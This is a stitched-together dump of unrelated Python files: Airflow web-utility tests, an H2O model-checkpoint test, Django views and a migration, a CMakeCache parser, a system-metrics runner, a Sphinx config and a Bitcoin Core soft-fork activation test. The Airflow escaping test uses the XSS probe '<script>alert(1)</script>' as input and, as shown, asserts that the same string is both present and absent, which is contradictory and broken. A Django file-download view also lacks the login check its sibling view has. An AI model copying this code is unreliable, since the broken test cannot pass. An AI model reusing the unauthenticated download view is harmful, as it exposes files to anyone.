utils.open_maybe_zipped('/path/to/some/file.txt')
mock_file.assert_called_once_with('/path/to/some/file.txt', mode='r')
def test_open_maybe_zipped_normal_file_with_zip_in_name(self):
path = '/path/to/fakearchive.zip.other/file.txt'
with mock.patch(
'io.open', mock.mock_open(read_data="data")) as mock_file:
utils.open_maybe_zipped(path)
mock_file.assert_called_once_with(path, mode='r')
@mock.patch("zipfile.is_zipfile")
@mock.patch("zipfile.ZipFile")
def test_open_maybe_zipped_archive(self, mocked_zip_file, mocked_is_zipfile):
mocked_is_zipfile.return_value = True
instance = mocked_zip_file.return_value
instance.open.return_value = mock.mock_open(read_data="data")
utils.open_maybe_zipped('/path/to/archive.zip/deep/path/to/file.txt')
mocked_is_zipfile.assert_called_once_with('/path/to/archive.zip')
mocked_zip_file.assert_called_once_with('/path/to/archive.zip', mode='r')
instance.open.assert_called_once_with('deep/path/to/file.txt')
def test_state_token(self):
# It's shouldn't possible to set these odd values anymore, but lets
# ensure they are escaped!
html = str(utils.state_token('<script>alert(1)</script>'))
self.assertIn(
'<script>alert(1)</script>',
html,
)
self.assertNotIn(
'<script>alert(1)</script>',
html,
)
def test_task_instance_link(self):
from airflow.www.app import cached_appbuilder
with cached_appbuilder(testing=True).app.test_request_context():
html = str(utils.task_instance_link({
'dag_id': '<a&1>',
'task_id': '<b2>',
'execution_date': datetime.now()
}))
self.assertIn('%3Ca%261%3E', html)
self.assertIn('%3Cb2%3E', html)
self.assertNotIn('<a&1>', html)
self.assertNotIn('<b2>', html)
def test_dag_link(self):
from airflow.www.app import cached_appbuilder
with cached_appbuilder(testing=True).app.test_request_context():
html = str(utils.dag_link({
'dag_id': '<a&1>',
'execution_date': datetime.now()
}))
self.assertIn('%3Ca%261%3E', html)
self.assertNotIn('<a&1>', html)
def test_dag_run_link(self):
from airflow.www.app import cached_appbuilder
with cached_appbuilder(testing=True).app.test_request_context():
html = str(utils.dag_run_link({
'dag_id': '<a&1>',
'run_id': '<b2>',
'execution_date': datetime.now()
}))
self.assertIn('%3Ca%261%3E', html)
self.assertIn('%3Cb2%3E', html)
self.assertNotIn('<a&1>', html)
self.assertNotIn('<b2>', html)
class TestAttrRenderer(unittest.TestCase):
def setUp(self):
self.attr_renderer = utils.get_attr_renderer()
def test_python_callable(self):
def example_callable(unused_self):
print("example")
rendered = self.attr_renderer["python_callable"](example_callable)
self.assertIn('"example"', rendered)
def test_python_callable_none(self):
rendered = self.attr_renderer["python_callable"](None)
self.assertEqual("", rendered)
def test_markdown(self):
markdown = "* foo\n* bar"
rendered = self.attr_renderer["doc_md"](markdown)
self.assertIn("<li>foo</li>", rendered)
self.assertIn("<li>bar</li>", rendered)
def test_markdown_none(self):
rendered = self.attr_renderer["python_callable"](None)
self.assertEqual("", rendered)
|
import sys, os
sys.path.insert(1, "../../../")
import h2o, tests
import random
def milsong_checkpoint():
milsong_train = h2o.upload_file(h2o.locate("bigdata/laptop/milsongs/milsongs-train.csv.gz"))
milsong_valid = h2o.upload_file(h2o.locate("bigdata/laptop/milsongs/milsongs-test.csv.gz"))
distribution = "gaussian"
# build first model
ntrees1 = random.sample(range(50,100),1)[0]
max_depth1 = random.sample(range(2,6),1)[0]
min_rows1 = random.sample(range(10,16),1)[0]
print "ntrees model 1: {0}".format(ntrees1)
print "max_depth model 1: {0}".format(max_depth1)
print "min_rows model 1: {0}".format(min_rows1)
model1 = h2o.gbm(x=milsong_train[1:],y=milsong_train[0],ntrees=ntrees1,max_depth=max_depth1, min_rows=min_rows1,
distribution=distribution,validation_x=milsong_valid[1:],validation_y=milsong_valid[0])
# save the model, then load the model
path = os.path.normpath(os.path.join(os.path.dirname(os.path.realpath(__file__)),"..","..","results"))
assert os.path.isdir(path), "Expected save directory {0} to exist, but it does not.".format(path)
model_path = h2o.save_model(model1, path=path, force=True)
assert os.path.isdir(model_path), "Expected load directory {0} to exist, but it does not.".format(model_path)
restored_model = h2o.load_model(model_path)
# continue building the model
ntrees2 = ntrees1 + 50
max_depth2 = max_depth1
min_rows2 = min_rows1
print "ntrees model 2: {0}".format(ntrees2)
print "max_depth model 2: {0}".format(max_depth2)
print "min_rows model 2: {0}".format(min_rows2)
model2 = h2o.gbm(x=milsong_train[1:],y=milsong_train[0],ntrees=ntrees2,max_depth=max_depth2, min_rows=min_rows2,
distribution=distribution,validation_x=milsong_valid[1:],validation_y=milsong_valid[0],
checkpoint=restored_model._id)
# build the equivalent of model 2 in one shot
model3 = h2o.gbm(x=milsong_train[1:],y=milsong_train[0],ntrees=ntrees2,max_depth=max_depth2, min_rows=min_rows2,
distribution=distribution,validation_x=milsong_valid[1:],validation_y=milsong_valid[0])
if __name__ == "__main__":
tests.run_test(sys.argv, milsong_checkpoint)
|
"""Docstring for this file."""
__author__ = 'ismailsunni'
__project_name = 'watchkeeper'
__filename = 'reports'
__date__ = '8/4/15'
__copyright__ = 'imajimatika@gmail.com'
__doc__ = ''
import os
from django.contrib.auth.decorators import login_required
from django.shortcuts import render_to_response
from django.http import HttpResponse
from django.template import RequestContext
from event_mapper.models.daily_report import DailyReport
@login_required
def reports(request):
"""View for request."""
daily_reports = DailyReport.objects.all().order_by('-date_time')
return render_to_response(
'event_mapper/reports/reports_page.html',
{
'daily_reports': daily_reports
},
context_instance=RequestContext(request)
)
def download_report(request, report_id):
"""The view to download users data as CSV.
:param request: A django request object.
:type request: request
:return: A PDF File
:type: HttpResponse
"""
report = DailyReport.objects.get(id=report_id)
fsock = open(report.file_path, 'r')
response = HttpResponse(fsock, content_type='application/pdf')
response['Content-Disposition'] = 'attachment; filename="%s"' % (
os.path.basename(report.file_path)
)
return response
|
from __future__ import unicode_literals
import sorl.thumbnail.fields
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('fundraising', '0014_donation_receipt_email'),
]
operations = [
migrations.AlterField(
model_name='djangohero',
name='logo',
field=sorl.thumbnail.fields.ImageField(upload_to='fundraising/logos/', blank=True),
preserve_default=True,
),
]
|
from __future__ import with_statement
import os, sys, re
from Path import Path
COMMENT = re.compile( r"//|#" )
WS = re.compile( r"\s" )
class CacheEntry( object ):
def __init__( self, _line ):
line = WS.sub( "", str( _line ) )
if not line:
return None
elif COMMENT.match( line ):
return None
else:
# get rid of comments at the end of the line
line = COMMENT.split( line, 1 )[0].strip()
try:
name_type, value = line.split( '=' )
self._value = value.strip()
if self._value == '':
self._value = None
name, typ = name_type.split( ':' )
self._name = name.strip()
self._type = typ.strip()
except ValueError:
sys.stderr.write( "Could not parse line '%s'\n" % _line )
self._value = None
self._name = None
self._type = None
def __str__( self ):
val = ""
typ = ""
if self._value != None:
val = self._value
if self._type != None:
typ = self._type
if self._name == None:
return ""
else:
s = "%s:%s=%s" % ( self._name, typ, val )
return s.strip()
def __eq__( self, other ):
return str( self ) == str( other )
def __nonzero__( self ):
try:
return self._name != None and self._value != None
except AttributeError:
return False
def name( self ):
return self._name
def value( self, newval = None ):
if newval != None:
self._value = newval
else:
return self._value
def hint( self ):
"""Return the CMakeCache TYPE of the entry; used as a hint to CMake
GUIs."""
return self._type
class CMakeCache( object ):
"""This class is used to read in and get programmatic access to the
variables in a CMakeCache.txt file, manipulate them, and then write the
cache back out."""
def __init__( self, path=None ):
self._cachefile = Path( path )
_cachefile = str( self._cachefile )
self._entries = {}
if self._cachefile.exists():
with open( _cachefile ) as c:
entries = filter( None, map( lambda x: CacheEntry( x ),
c.readlines() ) )
entries = filter( lambda x: x.value() != None, entries )
for i in entries:
self._entries[i.name()] = i
def __contains__( self, thingy ):
try:
return thingy in self.names()
except TypeError:
return thingy in self._entries.values()
def __iter__( self ):
return self._entries
def __nonzero__( self ):
return len( self._entries ) > 0
def __str__( self ):
return os.linesep.join( map( lambda x: str( x ), self.entries() ) )
def add( self, entry ):
e = CacheEntry( entry )
if e:
if not e in self:
self._entries[e.name()] = e
else:
sys.stderr.write( "Entry for '%s' is already in the cache.\n" % \
e.name() )
else:
sys.stderr.write( "Could not create cache entry for '%s'\n" % e )
def update( self, entry ):
e = CacheEntry( entry )
if e:
self._entries[e.name()] = e
else:
sys.stderr.write( "Could not create cache entry for '%s'\n" % e )
def names( self ):
return self._entries.keys()
def entries( self ):
return self._entries.values()
def get( self, name ):
return self._entries[name]
def cachefile( self ):
return self._cachefile
def refresh( self ):
self.__init__( self._cachefile )
def write( self, newfile = None ):
if newfile == None:
newfile = self._cachefile
with open( newfile, 'w' ) as f:
for e in self.entries():
f.write( str( e ) + os.linesep )
|
from amonone.core.collector.collector import system_info_collector, process_info_collector
from amonone.core import settings
from amonone.utils.dates import unix_utc_now
import sys
class Runner(object):
def system(self):
system_info_dict = {}
memory = system_info_collector.get_memory_info()
cpu = system_info_collector.get_cpu_utilization()
loadavg = system_info_collector.get_load_average()
disk = system_info_collector.get_disk_usage()
network = system_info_collector.get_network_traffic()
uptime = system_info_collector.get_uptime()
if memory != False:
system_info_dict['memory'] = memory
if cpu != False:
system_info_dict['cpu'] = cpu
if loadavg != False:
system_info_dict['loadavg'] = loadavg
if disk != False:
system_info_dict['disk'] = disk
if network != False:
system_info_dict['network'] = network
if uptime != False:
system_info_dict['uptime'] = uptime
system_info_dict['time'] = unix_utc_now()
return system_info_dict
def processes(self):
process_checks = process_info_collector.process_list()
process_info_dict = {}
for process in process_checks:
command = process["command"]
command = command.replace(".", "")
del process["command"]
process_info_dict[command] = process
process_info_dict['time'] = unix_utc_now()
return process_info_dict
def distribution_info(self):
distribution_info = system_info_collector.get_system_info()
return distribution_info
runner = Runner()
|
import sys, os
sys.path.insert(0, os.path.abspath('..'))
import redcap
extensions = ['sphinx.ext.autodoc', 'sphinx.ext.todo', 'sphinx.ext.viewcode',
'sphinx.ext.autosummary', 'numpydoc']
numpydoc_show_class_members = False
templates_path = ['_templates']
source_suffix = '.rst'
master_doc = 'index'
project = u'PyCap'
copyright = u'2012, Scott Burns'
version = redcap.__version__
release = version
exclude_patterns = ['_build']
pygments_style = 'flask_theme_support.FlaskyStyle'
html_theme = 'default'
html_static_path = ['_static']
html_show_sourcelink = False
htmlhelp_basename = 'PyCapdoc'
latex_elements = {
}
latex_documents = [
('index', 'PyCap.tex', u'PyCap Documentation',
u'Scott Burns', 'manual'),
]
man_pages = [
('index', 'pycap', u'PyCap Documentation',
[u'Scott Burns'], 1)
]
texinfo_documents = [
('index', 'PyCap', u'PyCap Documentation',
u'Scott Burns', 'PyCap', 'One line description of project.',
'Miscellaneous'),
]
sys.path.append(os.path.abspath('_themes'))
html_theme_path = ['_themes']
html_theme = 'default'
|
"""Test activation of the first version bits soft fork.
This soft fork will activate the following BIPS:
BIP 68 - nSequence relative lock times
BIP 112 - CHECKSEQUENCEVERIFY
BIP 113 - MedianTimePast semantics for nLockTime
regtest lock-in with 108/144 block signalling
activation after a further 144 blocks
mine 82 blocks whose coinbases will be used to generate inputs for our tests
mine 61 blocks to transition from DEFINED to STARTED
mine 144 blocks only 100 of which are signaling readiness in order to fail to change state this period
mine 144 blocks with 108 signaling and verify STARTED->LOCKED_IN
mine 140 blocks and seed block chain with the 82 inputs will use for our tests at height 572
mine 3 blocks and verify still at LOCKED_IN and test that enforcement has not triggered
mine 1 block and test that enforcement has triggered (which triggers ACTIVE)
Test BIP 113 is enforced
Mine 4 blocks so next height is 580 and test BIP 68 is enforced for time and height
Mine 1 block so next height is 581 and test BIP 68 now passes time but not height
Mine 1 block so next height is 582 and test BIP 68 now passes time and height
Test that BIP 112 is enforced
Various transactions will be used to test that the BIPs rules are not enforced before the soft fork activates
And that after the soft fork activates transactions pass and fail as they should according to the rules.
For each BIP, transactions of versions 1 and 2 will be tested.
----------------
BIP 113:
bip113tx - modify the nLocktime variable
BIP 68:
bip68txs - 16 txs with nSequence relative locktime of 10 with various bits set as per the relative_locktimes below
BIP 112:
bip112txs_vary_nSequence - 16 txs with nSequence relative_locktimes of 10 evaluated against 10 OP_CSV OP_DROP
bip112txs_vary_nSequence_9 - 16 txs with nSequence relative_locktimes of 9 evaluated against 10 OP_CSV OP_DROP
bip112txs_vary_OP_CSV - 16 txs with nSequence = 10 evaluated against varying {relative_locktimes of 10} OP_CSV OP_DROP
bip112txs_vary_OP_CSV_9 - 16 txs with nSequence = 9 evaluated against varying {relative_locktimes of 10} OP_CSV OP_DROP
bip112tx_special - test negative argument to OP_CSV
"""
from decimal import Decimal
from itertools import product
from io import BytesIO
import time
from test_framework.blocktools import create_coinbase, create_block, create_transaction
from test_framework.messages import ToHex, CTransaction
from test_framework.mininode import P2PDataStore
from test_framework.script import (
CScript,
OP_CHECKSEQUENCEVERIFY,
OP_DROP,
)
from test_framework.test_framework import BitcoinTestFramework
from test_framework.util import (
assert_equal,
get_bip9_status,
hex_str_to_bytes,
)
BASE_RELATIVE_LOCKTIME = 10
SEQ_DISABLE_FLAG = 1 << 31
SEQ_RANDOM_HIGH_BIT = 1 << 25
SEQ_TYPE_FLAG = 1 << 22
SEQ_RANDOM_LOW_BIT = 1 << 18
def relative_locktime(sdf, srhb, stf, srlb):
"""Returns a locktime with certain bits set."""
locktime = BASE_RELATIVE_LOCKTIME
if sdf:
locktime |= SEQ_DISABLE_FLAG
if srhb:
locktime |= SEQ_RANDOM_HIGH_BIT
if stf:
locktime |= SEQ_TYPE_FLAG
if srlb:
locktime |= SEQ_RANDOM_LOW_BIT
return locktime
def all_rlt_txs(txs):
return [tx['tx'] for tx in txs]
def sign_transaction(node, unsignedtx):
rawtx = ToHex(unsignedtx)
signresult = node.signrawtransactionwithwallet(rawtx)
tx = CTransaction()
f = BytesIO(hex_str_to_bytes(signresult['hex']))
tx.deserialize(f)
return tx
def create_bip112special(node, input, txversion, address):
tx = create_transaction(node, input, address, amount=Decimal("49.98"))
tx.nVersion = txversion
signtx = sign_transaction(node, tx)
signtx.vin[0].scriptSig = CScript([-1, OP_CHECKSEQUENCEVERIFY, OP_DROP] + list(CScript(signtx.vin[0].scriptSig)))
return signtx
def send_generic_input_tx(node, coinbases, address):
return node.sendrawtransaction(ToHex(sign_transaction(node, create_transaction(node, node.getblock(coinbases.pop())['tx'][0], address, amount=Decimal("49.99")))))
def create_bip68txs(node, bip68inputs, txversion, address, locktime_delta=0):
"""Returns a list of bip68 transactions with different bits set."""
txs = []
assert(len(bip68inputs) >= 16)
for i, (sdf, srhb, stf, srlb) in enumerate(product(*[[True, False]] * 4)):
locktime = relative_locktime(sdf, srhb, stf, srlb)
tx = create_transaction(node, bip68inputs[i], address, amount=Decimal("49.98"))
tx.nVersion = txversion
tx.vin[0].nSequence = locktime + locktime_delta
tx = sign_transaction(node, tx)
tx.rehash()
txs.append({'tx': tx, 'sdf': sdf, 'stf': stf})
return txs
def create_bip112txs(node, bip112inputs, varyOP_CSV, txversion, address, locktime_delta=0):
"""Returns a list of bip68 transactions with different bits set."""
txs = []
assert(len(bip112inputs) >= 16)
for i, (sdf, srhb, stf, srlb) in enumerate(product(*[[True, False]] * 4)):
locktime = relative_locktime(sdf, srhb, stf, srlb)
tx = create_transaction(node, bip112inputs[i], address, amount=Decimal("49.98"))
if (varyOP_CSV): # if varying OP_CSV, nSequence is fixed
tx.vin[0].nSequence = BASE_RELATIVE_LOCKTIME + locktime_delta
else: # vary nSequence instead, OP_CSV is fixed
tx.vin[0].nSequence = locktime + locktime_delta
tx.nVersion = txversion
signtx = sign_transaction(node, tx)
if (varyOP_CSV):
signtx.vin[0].scriptSig = CScript([locktime, OP_CHECKSEQUENCEVERIFY, OP_DROP] + list(CScript(signtx.vin[0].scriptSig)))
else:
signtx.vin[0].scriptSig = CScript([BASE_RELATIVE_LOCKTIME, OP_CHECKSEQUENCEVERIFY, OP_DROP] + list(CScript(signtx.vin[0].scriptSig)))
tx.rehash()
txs.append({'tx': signtx, 'sdf': sdf, 'stf': stf})
return txs
class BIP68_112_113Test(BitcoinTestFramework):
def set_test_params(self):
self.num_nodes = 1
self.setup_clean_chain = True
self.extra_args = [['-whitelist=127.0.0.1', '-blockversion=4', '-addresstype=legacy']]
def skip_test_if_missing_module(self):
self.skip_if_no_wallet()
def generate_blocks(self, number, version, test_blocks=None):
if test_blocks is None:
test_blocks = []
for i in range(number):
block = self.create_test_block([], version)
test_blocks.append(block)
self.last_block_time += 600
self.tip = block.sha256
self.tipheight += 1
return test_blocks
def create_test_block(self, txs, version=536870912):
block = create_block(self.tip, create_coinbase(self.tipheight + 1), self.last_block_time + 600)
block.nVersion = version
block.vtx.extend(txs)
block.hashMerkleRoot = block.calc_merkle_root()
block.rehash()
block.solve()
return block
def sync_blocks(self, blocks, success=True, reject_code=None, reject_reason=None, request_block=True):
"""Sends blocks to test node. Syncs and verifies that tip has advanced to most recent block.
Call with success = False if the tip shouldn't advance to the most recent block."""
self.nodes[0].p2p.send_blocks_and_test(blocks, self.nodes[0], success=success, reject_code=reject_code, reject_reason=reject_reason, request_block=request_block)
def run_test(self):
self.nodes[0].add_p2p_connection(P2PDataStore())
self.log.info("Generate blocks in the past for coinbase outputs.")
long_past_time = int(time.time()) - 600 * 1000 # enough to build up to 1000 blocks 10 minutes apart without worrying about getting into the future
self.nodes[0].setmocktime(long_past_time - 100) # enough so that the generated blocks will still all be before long_past_time
self.coinbase_blocks = self.nodes[0].generate(1 + 16 + 2 * 32 + 1) # 82 blocks generated for inputs
self.nodes[0].setmocktime(0) # set time back to present so yielded blocks aren't in the future as we advance last_block_time
self.tipheight = 82 # height of the next block to build
self.last_block_time = long_past_time
self.tip = int(self.nodes[0].getbestblockhash(), 16)
self.nodeaddress = self.nodes[0].getnewaddress()
self.log.info("Test that the csv softfork is DEFINED")
assert_equal(get_bip9_status(self.nodes[0], 'csv')['status'], 'defined')
test_blocks = self.generate_blocks(61, 4)
self.sync_blocks(test_blocks)
self.log.info("Advance from DEFINED to STARTED, height = 143")
assert_equal(get_bip9_status(self.nodes[0], 'csv')['status'], 'started')
self.log.info("Fail to achieve LOCKED_IN")
# 100 out of 144 signal bit 0. Use a variety of bits to simulate multiple parallel softforks
test_blocks = self.generate_blocks(50, 536870913) # 0x20000001 (signalling ready)
test_blocks = self.generate_blocks(20, 4, test_blocks) # 0x00000004 (signalling not)
test_blocks = self.generate_blocks(50, 536871169, test_blocks) # 0x20000101 (signalling ready)
test_blocks = self.generate_blocks(24, 536936448, test_blocks) # 0x20010000 (signalling not)
self.sync_blocks(test_blocks)
self.log.info("Failed to advance past STARTED, height = 287")
assert_equal(get_bip9_status(self.nodes[0], 'csv')['status'], 'started')
self.log.info("Generate blocks to achieve LOCK-IN")
# 108 out of 144 signal bit 0 to achieve lock-in
# using a variety of bits to simulate multiple parallel softforks
test_blocks = self.generate_blocks(58, 536870913) # 0x20000001 (signalling ready)
test_blocks = self.generate_blocks(26, 4, test_blocks) # 0x00000004 (signalling not)
test_blocks = self.generate_blocks(50, 536871169, test_blocks) # 0x20000101 (signalling ready)
test_blocks = self.generate_blocks(10, 536936448, test_blocks) # 0x20010000 (signalling not)
self.sync_blocks(test_blocks)
self.log.info("Advanced from STARTED to LOCKED_IN, height = 431")
assert_equal(get_bip9_status(self.nodes[0], 'csv')['status'], 'locked_in')
# Generate 140 more version 4 blocks
test_blocks = self.generate_blocks(140, 4)
self.sync_blocks(test_blocks)
# Inputs at height = 572
#
# Put inputs for all tests in the chain at height 572 (tip now = 571) (time increases by 600s per block)
# Note we reuse inputs for v1 and v2 txs so must test these separately
# 16 normal inputs
bip68inputs = []
for i in range(16):
bip68inputs.append(send_generic_input_tx(self.nodes[0], self.coinbase_blocks, self.nodeaddress))
# 2 sets of 16 inputs with 10 OP_CSV OP_DROP (actually will be prepended to spending scriptSig)
bip112basicinputs = []
for j in range(2):
inputs = []
for i in range(16):
inputs.append(send_generic_input_tx(self.nodes[0], self.coinbase_blocks, self.nodeaddress))
bip112basicinputs.append(inputs)
# 2 sets of 16 varied inputs with (relative_lock_time) OP_CSV OP_DROP (actually will be prepended to spending scriptSig)
bip112diverseinputs = []
for j in range(2):
inputs = []
for i in range(16):
inputs.append(send_generic_input_tx(self.nodes[0], self.coinbase_blocks, self.nodeaddress))
bip112diverseinputs.append(inputs)
# 1 special input with -1 OP_CSV OP_DROP (actually will be prepended to spending scriptSig)
bip112specialinput = send_generic_input_tx(self.nodes[0], self.coinbase_blocks, self.nodeaddress)
# 1 normal input
bip113input = send_generic_input_tx(self.nodes[0], self.coinbase_blocks, self.nodeaddress)
self.nodes[0].setmocktime(self.last_block_time + 600)
inputblockhash = self.nodes[0].generate(1)[0] # 1 block generated for inputs to be in chain at height 572
self.nodes[0].setmocktime(0)
self.tip = int(inputblockhash, 16)
self.tipheight += 1
self.last_block_time += 600
assert_equal(len(self.nodes[0].getblock(inputblockhash, True)["tx"]), 82 + 1)
# 2 more version 4 blocks
test_blocks = self.generate_blocks(2, 4)
self.sync_blocks(test_blocks)
self.log.info("Not yet advanced to ACTIVE, height = 574 (will activate for block 576, not 575)")
assert_equal(get_bip9_status(self.nodes[0], 'csv')['status'], 'locked_in')
# Test both version 1 and version 2 transactions for all tests
# BIP113 test transaction will be modified before each use to put in appropriate block time
bip113tx_v1 = create_transaction(self.nodes[0], bip113input, self.nodeaddress, amount=Decimal("49.98"))
bip113tx_v1.vin[0].nSequence = 0xFFFFFFFE
bip113tx_v1.nVersion = 1
bip113tx_v2 = create_transaction(self.nodes[0], bip113input, self.nodeaddress, amount=Decimal("49.98"))
bip113tx_v2.vin[0].nSequence = 0xFFFFFFFE
bip113tx_v2.nVersion = 2
# For BIP68 test all 16 relative sequence locktimes
bip68txs_v1 = create_bip68txs(self.nodes[0], bip68inputs, 1, self.nodeaddress)
bip68txs_v2 = create_bip68txs(self.nodes[0], bip68inputs, 2, self.nodeaddress)
# For BIP112 test:
# 16 relative sequence locktimes of 10 against 10 OP_CSV OP_DROP inputs
bip112txs_vary_nSequence_v1 = create_bip112txs(self.nodes[0], bip112basicinputs[0], False, 1, self.nodeaddress)
bip112txs_vary_nSequence_v2 = create_bip112txs(self.nodes[0], bip112basicinputs[0], False, 2, self.nodeaddress)
# 16 relative sequence locktimes of 9 against 10 OP_CSV OP_DROP inputs
bip112txs_vary_nSequence_9_v1 = create_bip112txs(self.nodes[0], bip112basicinputs[1], False, 1, self.nodeaddress, -1)
bip112txs_vary_nSequence_9_v2 = create_bip112txs(self.nodes[0], bip112basicinputs[1], False, 2, self.nodeaddress, -1)
# sequence lock time of 10 against 16 (relative_lock_time) OP_CSV OP_DROP inputs
bip112txs_vary_OP_CSV_v1 = create_bip112txs(self.nodes[0], bip112diverseinputs[0], True, 1, self.nodeaddress)
bip112txs_vary_OP_CSV_v2 = create_bip112txs(self.nodes[0], bip112diverseinputs[0], True, 2, self.nodeaddress)
# sequence lock time of 9 against 16 (relative_lock_time) OP_CSV OP_DROP inputs
bip112txs_vary_OP_CSV_9_v1 = create_bip112txs(self.nodes[0], bip112diverseinputs[1], True, 1, self.nodeaddress, -1)
bip112txs_vary_OP_CSV_9_v2 = create_bip112txs(self.nodes[0], bip112diverseinputs[1], True, 2, self.nodeaddress, -1)
# -1 OP_CSV OP_DROP input
bip112tx_special_v1 = create_bip112special(self.nodes[0], bip112specialinput, 1, self.nodeaddress)
bip112tx_special_v2 = create_bip112special(self.nodes[0], bip112specialinput, 2, self.nodeaddress)
self.log.info("TESTING")
self.log.info("Pre-Soft Fork Tests. All txs should pass.")
self.log.info("Test version 1 txs")
success_txs = []
# add BIP113 tx and -1 CSV tx
bip113tx_v1.nLockTime = self.last_block_time - 600 * 5 # = MTP of prior block (not <) but < time put on current block
bip113signed1 = sign_transaction(self.nodes[0], bip113tx_v1)
success_txs.append(bip113signed1)
success_txs.append(bip112tx_special_v1)
# add BIP 68 txs
success_txs.extend(all_rlt_txs(bip68txs_v1))
# add BIP 112 with seq=10 txs
success_txs.extend(all_rlt_txs(bip112txs_vary_nSequence_v1))
success_txs.extend(all_rlt_txs(bip112txs_vary_OP_CSV_v1))
# try BIP 112 with seq=9 txs
success_txs.extend(all_rlt_txs(bip112txs_vary_nSequence_9_v1))
success_txs.extend(all_rlt_txs(bip112txs_vary_OP_CSV_9_v1))
self.sync_blocks([self.create_test_block(success_txs)])
self.nodes[0].invalidateblock(self.nodes[0].getbestblockhash())
self.log.info("Test version 2 txs")
success_txs = []
# add BIP113 tx and -1 CSV tx
bip113tx_v2.nLockTime = self.last_block_time - 600 * 5 # = MTP of prior block (not <) but < time put on current block
bip113signed2 = sign_transaction(self.nodes[0], bip113tx_v2)
success_txs.append(bip113signed2)
success_txs.append(bip112tx_special_v2)
# add BIP 68 txs
success_txs.extend(all_rlt_txs(bip68txs_v2))
# add BIP 112 with seq=10 txs
success_txs.extend(all_rlt_txs(bip112txs_vary_nSequence_v2))
success_txs.extend(all_rlt_txs(bip112txs_vary_OP_CSV_v2))
# try BIP 112 with seq=9 txs
success_txs.extend(all_rlt_txs(bip112txs_vary_nSequence_9_v2))
success_txs.extend(all_rlt_txs(bip112txs_vary_OP_CSV_9_v2))
self.sync_blocks([self.create_test_block(success_txs)])
self.nodes[0].invalidateblock(self.nodes[0].getbestblockhash())
# 1 more version 4 block to get us to height 575 so the fork should now be active for the next block
test_blocks = self.generate_blocks(1, 4)
self.sync_blocks(test_blocks)
assert_equal(get_bip9_status(self.nodes[0], 'csv')['status'], 'active')
self.log.info("Post-Soft Fork Tests.")
self.log.info("BIP 113 tests")
# BIP 113 tests should now fail regardless of version number if nLockTime isn't satisfied by new rules
bip113tx_v1.nLockTime = self.last_block_time - 600 * 5 # = MTP of prior block (not <) but < time put on current block
bip113signed1 = sign_transaction(self.nodes[0], bip113tx_v1)
bip113tx_v2.nLockTime = self.last_block_time - 600 * 5 # = MTP of prior block (not <) but < time put on current block
bip113signed2 = sign_transaction(self.nodes[0], bip113tx_v2)
for bip113tx in [bip113signed1, bip113signed2]:
self.sync_blocks([self.create_test_block([bip113tx])], success=False)
# BIP 113 tests should now pass if the locktime is < MTP
bip113tx_v1.nLockTime = self.last_block_time - 600 * 5 - 1 # < MTP of prior block
bip113signed1 = sign_transaction(self.nodes[0], bip113tx_v1)
bip113tx_v2.nLockTime = self.last_block_time - 600 * 5 - 1 # < MTP of prior block
bip113signed2 = sign_transaction(self.nodes[0], bip113tx_v2)
for bip113tx in [bip113signed1, bip113signed2]:
self.sync_blocks([self.create_test_block([bip113tx])])
self.nodes[0].invalidateblock(self.nodes[0].getbestblockhash())
# Next block height = 580 after 4 blocks of random version
test_blocks = self.generate_blocks(4, 1234)
self.sync_blocks(test_blocks)
self.log.info("BIP 68 tests")
self.log.info("Test version 1 txs - all should still pass")
success_txs = []
success_txs.extend(all_rlt_txs(bip68txs_v1))
self.sync_blocks([self.create_test_block(success_txs)])
self.nodes[0].invalidateblock(self.nodes[0].getbestblockhash())
self.log.info("Test version 2 txs")
# All txs with SEQUENCE_LOCKTIME_DISABLE_FLAG set pass
bip68success_txs = [tx['tx'] for tx in bip68txs_v2 if tx['sdf']]
self.sync_blocks([self.create_test_block(bip68success_txs)])
self.nodes[0].invalidateblock(self.nodes[0].getbestblockhash())
# All txs without flag fail as we are at delta height = 8 < 10 and delta time = 8 * 600 < 10 * 512
bip68timetxs = [tx['tx'] for tx in bip68txs_v2 if not tx['sdf'] and tx['stf']]
for tx in bip68timetxs:
self.sync_blocks([self.create_test_block([tx])], success=False)
bip68heighttxs = [tx['tx'] for tx in bip68txs_v2 if not tx['sdf'] and not tx['stf']]
for tx in bip68heighttxs:
self.sync_blocks([self.create_test_block([tx])], success=False)
# Advance one block to 581
test_blocks = self.generate_blocks(1, 1234)
self.sync_blocks(test_blocks)
# Height txs should fail and time txs should now pass 9 * 600 > 10 * 512
bip68success_txs.extend(bip68timetxs)
self.sync_blocks([self.create_test_block(bip68success_txs)])
self.nodes[0].invalidateblock(self.nodes[0].getbestblockhash())
for tx in bip68heighttxs:
self.sync_blocks([self.create_test_block([tx])], success=False)
# Advance one block to 582
test_blocks = self.generate_blocks(1, 1234)
self.sync_blocks(test_blocks)
# All BIP 68 txs should pass
bip68success_txs.extend(bip68heighttxs)
self.sync_blocks([self.create_test_block(bip68success_txs)])
self.nodes[0].invalidateblock(self.nodes[0].getbestblockhash())
self.log.info("BIP 112 tests")
self.log.info("Test version 1 txs")
# -1 OP_CSV tx should fail
self.sync_blocks([self.create_test_block([bip112tx_special_v1])], success=False)
# If SEQUENCE_LOCKTIME_DISABLE_FLAG is set in argument to OP_CSV, version 1 txs should still pass
success_txs = [tx['tx'] for tx in bip112txs_vary_OP_CSV_v1 if tx['sdf']]
success_txs += [tx['tx'] for tx in bip112txs_vary_OP_CSV_9_v1 if tx['sdf']]
self.sync_blocks([self.create_test_block(success_txs)])
self.nodes[0].invalidateblock(self.nodes[0].getbestblockhash())
# If SEQUENCE_LOCKTIME_DISABLE_FLAG is unset in argument to OP_CSV, version 1 txs should now fail
fail_txs = all_rlt_txs(bip112txs_vary_nSequence_v1)
fail_txs += all_rlt_txs(bip112txs_vary_nSequence_9_v1)
fail_txs += [tx['tx'] for tx in bip112txs_vary_OP_CSV_9_v1 if not tx['sdf']]
fail_txs += [tx['tx'] for tx in bip112txs_vary_OP_CSV_9_v1 if not tx['sdf']]
for tx in fail_txs:
self.sync_blocks([self.create_test_block([tx])], success=False)
self.log.info("Test version 2 txs")
# -1 OP_CSV tx should fail
self.sync_blocks([self.create_test_block([bip112tx_special_v2])], success=False)
# If SEQUENCE_LOCKTIME_DISABLE_FLAG is set in argument to OP_CSV, version 2 txs should pass (all sequence locks are met)
success_txs = [tx['tx'] for tx in bip112txs_vary_OP_CSV_v2 if tx['sdf']]
success_txs += [tx['tx'] for tx in bip112txs_vary_OP_CSV_9_v2 if tx['sdf']]
self.sync_blocks([self.create_test_block(success_txs)])
self.nodes[0].invalidateblock(self.nodes[0].getbestblockhash())
